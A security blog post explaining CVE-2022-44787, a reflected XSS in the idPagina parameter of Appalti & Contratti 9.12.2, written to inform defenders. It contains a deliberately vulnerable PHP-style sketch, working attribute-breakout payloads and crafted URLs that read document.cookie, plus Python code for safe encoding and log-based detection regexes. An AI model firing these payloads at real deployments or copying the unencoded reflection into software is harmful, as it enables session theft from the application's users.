
Published: June 2024

If you work with e-procurement systems, especially Appalti & Contratti, CVE-2022-44787 deserves your immediate attention. This post covers the vulnerability openly: what the flaw is, a step-by-step walkthrough with code examples, and how an attacker would exploit it. Let's get straight to what you need to know.

What is CVE-2022-44787?

CVE-2022-44787 is a vulnerability in *Appalti & Contratti* version 9.12.2. The issue is a Reflected Cross-Site Scripting (XSS) flaw caused by improper input handling of the GET parameter idPagina. The application reflects this parameter's value into the HTML response without any sanitization or output encoding, so an attacker can break out of the attribute the value lands in and inject markup and script.

Why is this dangerous?

A reflected XSS lets an attacker execute arbitrary JavaScript in a victim's browser by tricking the victim into opening a crafted link. Once the script runs in the application's origin it can read cookies that are not flagged HttpOnly, steal session tokens held in the page, or perform actions on the victim's behalf.

The vulnerable endpoint looks like this (simplified example)

GET http://example.com/app/main?idPagina=...

The server-side code does not encode the idPagina parameter before rendering it, so any HTML or JavaScript placed in the value is reflected verbatim in the server response. Even dangerous HTML attributes, such as event handlers, are not filtered.

Here's a minimal PHP-style sketch of the pattern (an illustration of the bug, not the application's actual source):

<?php
// Vulnerable: outputs unencoded GET parameter
echo "<div id='content' idPagina='" . $_GET['idPagina'] . "'>";
?>

A victim who opens a specially crafted link and then moves the pointer over the reflected element triggers the injected script.

Proof-of-Concept (PoC) Payload

The exploit relies on two facts: the value lands inside a single-quoted attribute, and event-handler attributes such as onmouseenter are not filtered. The raw parameter value is:

1' onmouseenter='alert(document.cookie)' 

The leading 1' closes the idPagina attribute, onmouseenter='...' adds a handler to the same element, and the trailing space means the application's own closing quote becomes a stray, harmless attribute. Encoded as a URL (the + signs decode to spaces on the server):

http://example.com/app/main?idPagina=1'+onmouseenter='alert(document.cookie)'+

When a victim visits this crafted URL and moves the mouse pointer over the element that reflects idPagina, alert(document.cookie) executes. A real attacker would send the value to a server they control rather than display it.

Putting it together, the attack has two steps:

1. The attacker crafts a link carrying the payload (here a harmless alert, but any JavaScript can be substituted):

http://example.com/app/main?idPagina=1'+onmouseenter='alert("Hacked!")'+

2. The victim opens the link (the attacker typically uses phishing or other social engineering to get them to do so) and, once the page has loaded, moves the mouse over the element that reflects idPagina.

Let's see how the injected payload renders in the HTML returned by the server (using the single-quoted template from the PHP-style sketch above):

<div id='content' idPagina='1' onmouseenter='alert(document.cookie)' '>
    ... rest of your page content ...
</div>

The browser now parses onmouseenter as an attribute of the div, so as soon as the pointer enters the element, alert(document.cookie) fires, demonstrating an active XSS exploit.
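To make the attribute breakout concrete, here is an added example (not Appalti & Contratti code) that models the PHP-style reflection above in Python, decodes the PoC URL the way the server would, and checks what an HTML parser makes of the vulnerable output versus an assumed fix that HTML-encodes the value. The URL, the template and the fixed render function are all assumptions for illustration; the injected handler only appears on the element when the value is reflected raw.

```python
# Added example (not Appalti & Contratti code): a model of the idPagina
# reflection, the same injection rendered through it, and an assumed fix.
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed PoC URL with the same shape as the one shown above.
POC_URL = ("http://example.com/app/main"
           "?idPagina=1'+onmouseenter='alert(document.cookie)'+")


def id_pagina_from_url(url: str) -> str:
    """Return the idPagina value as the server sees it ('+' decodes to a space)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params["idPagina"][0]


def render_vulnerable(id_pagina: str) -> str:
    """Mirrors the PHP-style snippet: the raw value is concatenated into a
    single-quoted attribute, so a quote in the input ends the attribute."""
    return "<div id='content' idPagina='" + id_pagina + "'>"


def render_fixed(id_pagina: str) -> str:
    """Assumed fix: HTML-attribute-encode the value first.  quote=True turns
    both ' and " into character references, so the attribute cannot be closed
    early and no new attribute or tag can start inside it."""
    return "<div id='content' idPagina='" + escape(id_pagina, quote=True) + "'>"


class _FirstTagAttrs(HTMLParser):
    """Records the attributes a browser-like parser assigns to the first tag."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if self.attrs is None:
            self.attrs = dict(attrs)  # attribute names are lower-cased by HTMLParser


def parsed_attrs(html: str) -> dict:
    """Attributes of the reflected element, as the parser sees them."""
    parser = _FirstTagAttrs()
    parser.feed(html)
    return parser.attrs or {}


def injected_handlers(html: str) -> list:
    """Event-handler attributes (on*) that ended up on the reflected element."""
    return sorted(name for name in parsed_attrs(html) if name.startswith("on"))


if __name__ == "__main__":
    value = id_pagina_from_url(POC_URL)
    for label, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        html = render(value)
        print(label, html)
        print("  handlers:", injected_handlers(html))
```

In the vulnerable render the parser sees idPagina='1' plus a separate onmouseenter attribute; in the fixed render the whole injected string stays inside a single attribute value and no handler exists. Note that attribute encoding is the right fix only because the value lands inside a quoted attribute; a value reflected into an unquoted attribute, a script block or a URL would need the encoding appropriate to that context.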

Real World Impact

If you're running Appalti & Contratti 9.12.2, your users are exposed to data theft, session hijacking, redirection to malicious websites, and any other action the injected script chooses to perform in their session.

If you're an administrator or user

- Update to the latest version as soon as the vendor releases a fix (check the vendor's site).
- Until then, treat links to the application that arrive by e-mail or chat with suspicion, and look for unexpected quotes, tags or on* handlers in the idPagina parameter.
- If you maintain the code, HTML-encode the idPagina value for the attribute context before reflecting it.
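For anyone who wants to know whether the crafted links above have already been aimed at their deployment, here is an added example (not part of the original post) that URL-decodes the idPagina parameter from access log lines and flags attribute or tag breakouts. The log lines are constructed, and the combined log format is assumed for whatever front end sits in front of the application; matching on the decoded value means the '+'-encoded PoC, its percent-encoded twin and a tag-based variant are all caught, while a legitimate apostrophe such as O'Brien is not.

```python
# Added example (not part of the original post): flag exploitation attempts
# against idPagina in web server access logs.  The log lines are constructed,
# and the combined log format is assumed for the front end in front of the app.
import re
from urllib.parse import parse_qs, urlsplit

SAMPLE_LOG = """\
10.0.0.5 - - [21/Nov/2022:10:00:01 +0000] "GET /app/main?idPagina=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [21/Nov/2022:10:00:02 +0000] "GET /app/main?idPagina=1'+onmouseenter='alert(document.cookie)'+ HTTP/1.1" 200 5133 "-" "Mozilla/5.0"
10.0.0.9 - - [21/Nov/2022:10:00:03 +0000] "GET /app/main?idPagina=1%27%20onmouseenter%3D%27alert%28%22Hacked%21%22%29%27%20 HTTP/1.1" 200 5133 "-" "curl/7.85.0"
10.0.0.11 - - [21/Nov/2022:10:00:04 +0000] "GET /app/main?idPagina=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 5140 "-" "Mozilla/5.0"
10.0.0.13 - - [21/Nov/2022:10:00:05 +0000] "GET /app/other?idPagina=O'Brien HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Client IP, timestamp and request target from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')

# Markers of an attribute or tag breakout in the *decoded* parameter value.
# Decoding first means percent-encoded and '+'-encoded variants of the same
# payload are treated alike.
BREAKOUT_RE = re.compile(
    r"""(?:['"]\s*on\w+\s*=)    # a quote closes the attribute, then an on* handler
      | (?:<\s*[a-z]+)          # a new tag is opened
      | (?:javascript\s*:)      # scheme-based payload
    """, re.IGNORECASE | re.VERBOSE)


def decoded_params(target: str) -> dict:
    """Query parameters of a request target, decoded the way the server sees them."""
    return parse_qs(urlsplit(target).query, keep_blank_values=True)


def is_breakout(value: str) -> bool:
    """True if a parameter value tries to escape an attribute or start markup."""
    return BREAKOUT_RE.search(value) is not None


def scan_log(text: str, param: str = "idPagina") -> list:
    """Return (client_ip, timestamp, decoded_value) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        for value in decoded_params(m["target"]).get(param, []):
            if is_breakout(value):
                hits.append((m["ip"], m["ts"], value))
    return hits


if __name__ == "__main__":
    for ip, ts, value in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} idPagina={value!r}")
```

Running this over the constructed lines reports the three attack attempts and nothing else. The pattern is deliberately narrow (a quote followed by an on* handler, a new tag, or a javascript: scheme); widen it if your logs show other encodings, and remember that a hit in the log only proves an attempt, not that a victim's browser ever executed the payload.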

References

- NVD - CVE-2022-44787
- OWASP XSS Cheat Sheet
- Appalti & Contratti Official Site

Conclusion

CVE-2022-44787 in Appalti & Contratti 9.12.2 is a straightforward yet serious example of how user input, reflected without encoding, opens the door to arbitrary JavaScript execution. Always validate input, encode output for the context it lands in, and stay proactive with security updates.

*Stay safe. Patch quickly.*


Timeline

Published on: 11/21/2022 23:15:00 UTC
Last modified on: 11/23/2022 16:02:00 UTC